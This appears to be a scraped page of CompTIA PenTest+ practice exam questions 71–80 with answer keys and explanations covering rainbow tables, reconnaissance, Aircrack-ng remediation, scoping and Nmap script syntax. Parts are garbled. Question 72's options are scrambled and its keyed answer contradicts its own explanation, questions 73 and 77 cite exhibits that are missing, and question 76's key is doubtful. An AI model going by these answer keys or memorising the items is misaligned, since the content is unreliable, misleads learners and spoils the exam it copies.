CompTIA CompTIA Certifications PT0-003 Questions & Answers

• Question 71:

  User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

  A. MD5

  B. bcrypt

  C. SHA-1

  D. PBKDF2

  Correct Answer: A

  Reference: https://www.geeksforgeeks.org/understanding-rainbow-table-attack/

• Question 72:

  A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment. Which of the following would most likely produce useful information for additional testing?

  A. Searching for code repositories associated with a developer who previously worked for the target company code repositories associated with the

  B. Searching for code repositories target company's organization

  C. Searching for code repositories associated with the target company's organization

  D. Searching for code repositories associated with a developer who previously worked for the target company

  Correct Answer: B

  Code repositories are online platforms that store and manage source code and other files related to software development projects. Code repositories can contain useful information for additional testing, such as application names, versions, features, functions, vulnerabilities, dependencies, credentials, comments, or documentation. Searching for code repositories associated with the target company's organization would most likely produce useful information for additional testing, as it would reveal the software projects that the target company is working on or using, and potentially expose some weaknesses or flaws that can be exploited. Code repositories can be searched by using tools such as GitHub, GitLab, Bitbucket, or SourceForge1. The other options are not as likely to produce useful information for additional testing, as they are not directly related to the target company's software development activities. Searching for code repositories associated with a developer who previously worked for the target company may not yield any relevant or current information, as the developer may have deleted, moved, or updated their code repositories after leaving the company. Searching for code repositories associated with the target company's competitors or customers may not yield any useful or accessible information, as they may have different or unrelated software projects, or they may have restricted or protected their code repositories from public view.

• Question 73:

  A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

  

  Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

  A. Edit the discovered file with one line of code for remote callback

  B. Download .pl files and look for usernames and passwords

  C. Edit the smb.conf file and upload it to the server

  D. Download the smb.conf file and look at configurations

  Correct Answer: C

• Question 74:

  During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

  A. Changing to Wi-Fi equipment that supports strong encryption

  B. Using directional antennae

  C. Using WEP encryption

  D. Disabling Wi-Fi

  Correct Answer: A

  If a penetration tester was able to access the organization's wireless network from outside of the building using Aircrack-ng, then it means that the wireless network was not secured with strong encryption or authentication methods. Aircrackng is a tool that can crack weak wireless encryption schemes such as WEP or WPA-PSK using various techniques such as packet capture, injection, replay, and brute force. To remediate this issue, the client should change to Wi-Fi equipment that supports strong encryption such as WPA2 or WPA3, which are more resistant to cracking attacks. Using directional antennae may reduce the signal range of the wireless network, but it would not prevent an attacker who is within range from cracking the encryption. Using WEP encryption is not a good recommendation, as WEP is known to be insecure and vulnerable to Aircrack-ng attacks. Disabling Wi-Fi may eliminate the risk of wireless attacks, but it would also eliminate the benefits of wireless connectivity for the organization.

• Question 75:

  Which of the following should be included in scope documentation?

  A. Service accounts

  B. Tester experience

  C. Disclaimer

  D. Number of tests

  Correct Answer: C

  A disclaimer is a statement that limits the liability of the penetration tester and the client in case of any unintended consequences or damages caused by the testing activities. It should be included in the scope documentation to clarify the roles and responsibilities of both parties and to avoid any legal disputes or misunderstandings. Service accounts, tester experience, and number of tests are not essential elements of the scope documentation, although they may be relevant for other aspects of the penetration testing process. References: The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 1: Planning and Scoping Penetration Tests1; The Official CompTIA PenTest+ Student Guide (Exam PT0002), Lesson 1: Planning and Scoping Penetration Tests2; What is the Scope of a Penetration Test?3

• Question 76:

  A Chief Information Security Officer wants to evaluate the security of the company's e- commerce application.

  Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?

  A. SQLmap

  B. DirBuster

  C. w3af

  D. OWASP ZAP

  Correct Answer: C

  W3AF, the Web Application Attack and Audit Framework, is an open source web application security scanner that includes directory and filename bruteforcing in its list of capabilities.

• Question 77:

  The following line-numbered Python code snippet is being used in reconnaissance:

  

  Which of the following line numbers from the script MOST likely contributed to the script triggering a "probable port scan" alert in the organization's IDS?

  A. Line 01

  B. Line 02

  C. Line 07

  D. Line 08

  Correct Answer: D

• Question 78:

  A company provided the following network scope for a penetration test: 169.137.1.0/24 221.10.1.0/24 149.14.1.0/24 A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party.

  Which of the following stakeholders is responsible for this mistake?

  A. The company that requested the penetration test

  B. The penetration testing company

  C. The target host's owner

  D. The penetration tester

  E. The subcontractor supporting the test

  Correct Answer: A

  The company that requested the penetration test is responsible for providing the correct and accurate network scope for the test. The network scope defines the boundaries and limitations of the test, such as which IP addresses, domains, systems, or networks are in scope or out of scope. If the company provided an incorrect network scope that included an IP address that belongs to a third party, then it is responsible for this mistake. The penetration testing company, the target host's owner, the penetration tester, and the subcontractor supporting the test are not responsible for this mistake, as they relied on the network scope provided by the company that requested the penetration test.

• Question 79:

  A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

  A. Halt the penetration test.

  B. Contact law enforcement.

  C. Deconflict with the penetration tester.

  D. Assume the alert is from the penetration test.

  Correct Answer: C

  Deconflicting with the penetration tester is the best thing to do next after the security alarms are triggered during a penetration test, as it will help determine whether the alarm was caused by the tester's activity or by an actual threat. Deconflicting is the process of communicating and coordinating with other parties involved in a penetration testing engagement, such as security teams, network administrators, or emergency contacts, to avoid confusion or interference.

• Question 80:

  During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder:

  /home/user/scripts

  Which of the following commands should the penetration tester use to perform this scan?

  A. nmap resume "not intrusive"

  B. nmap script default safe

  C. nmap script /home/user/scripts

  D. nmap -load /home/user/scripts

  Correct Answer: C

  The Nmap command in the question aims to use custom NSE scripts stored in a specific folder. The correct syntax for this option is to use the script argument followed by the path to the folder. The other commands are either invalid, use the wrong argument, or do not specify the folder path. References: Best PenTest+ certification study resources and training materials, CompTIA PenTest+ PT0-002 Cert Guide, 101 Labs -- CompTIA PenTest+: Hands-on Labs for the PT0-002 Exam